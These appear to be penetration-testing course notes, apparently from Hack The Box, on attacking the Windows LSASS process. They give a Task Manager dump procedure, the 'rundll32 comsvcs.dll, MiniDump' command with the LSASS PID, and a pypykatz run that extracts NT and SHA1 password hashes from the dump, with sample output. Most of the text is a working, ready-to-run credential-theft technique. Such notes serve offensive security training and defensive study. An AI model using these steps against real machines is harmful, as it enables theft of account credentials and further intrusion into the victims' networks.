Attacking LSASS

Upon initial logon, LSASS will:

• Cache credentials locally in memory
• Create access tokens
• Enforce security policies
• Write to Windows security log

Dumping

TaskManager

When with GUI:

Open Task Manager > Select the Processes tab > Find & right click the Local Security Authority Process > Select Create dump file

lsass.DMP is saved in:

C:\Users\loggedonusersdirectory\AppData\Local\Temp

Dundll32.exe Conmsvcs.dll

Faster and more accessible method compared to TaskManager method since it only requires CLI.

But it is diagnosed as malicious by most of modern anti-virus system.

1. Look for process ID(PID) related assigned to lsass.exe

C:\Windows\system32> tasklist /svc
 
Image Name                     PID Services
========================= ======== ============================================
System Idle Process              0 N/A
System                           4 N/A
Registry                        96 N/A
smss.exe                       344 N/A
csrss.exe                      432 N/A
wininit.exe                    508 N/A
csrss.exe                      520 N/A
winlogon.exe                   580 N/A
services.exe                   652 N/A
lsass.exe                      672 KeyIso, SamSs, VaultSvc
svchost.exe                    776 PlugPlay
svchost.exe                    804 BrokerInfrastructure, DcomLaunch, Power,
                                   SystemEventsBroker
fontdrvhost.exe                812 N/A

In powershell:

PS C:\Windows\system32> Get-Process lsass
 
Handles  NPM(K)    PM(K)      WS(K)     CPU(s)     Id  SI ProcessName
-------  ------    -----      -----     ------     --  -- -----------
   1260      21     4948      15396       2.56    672   0 lsass

2. Create lsass.dmp

PS C:\Windows\system32> rundll32 C:\windows\system32\comsvcs.dll, MiniDump 672 C:\lsass.dmp full

Extract Creds

Once we have the dump transferred to attacker machine, there’s a lot we can do.

Pypykatz

Mimikatz written in Python.

Benefit: We can run it offline from our Linux based attacker machine.

jadu101@htb[/htb]$ pypykatz lsa minidump /home/peter/Documents/lsass.dmp 
 
INFO:root:Parsing file /home/peter/Documents/lsass.dmp
FILE: ======== /home/peter/Documents/lsass.dmp =======
== LogonSession ==
authentication_id 1354633 (14ab89)
session_id 2
username bob
domainname DESKTOP-33E7O54
logon_server WIN-6T0C3J2V6HP
logon_time 2021-12-14T18:14:25.514306+00:00
sid S-1-5-21-4019466498-1700476312-3544718034-1001
luid 1354633
	== MSV ==
		Username: bob
		Domain: DESKTOP-33E7O54
		LM: NA
		NT: 64f12cddaa88057e06a81b54e73b949b
		SHA1: cba4e545b7ec918129725154b29f055e4cd5aea8
		DPAPI: NA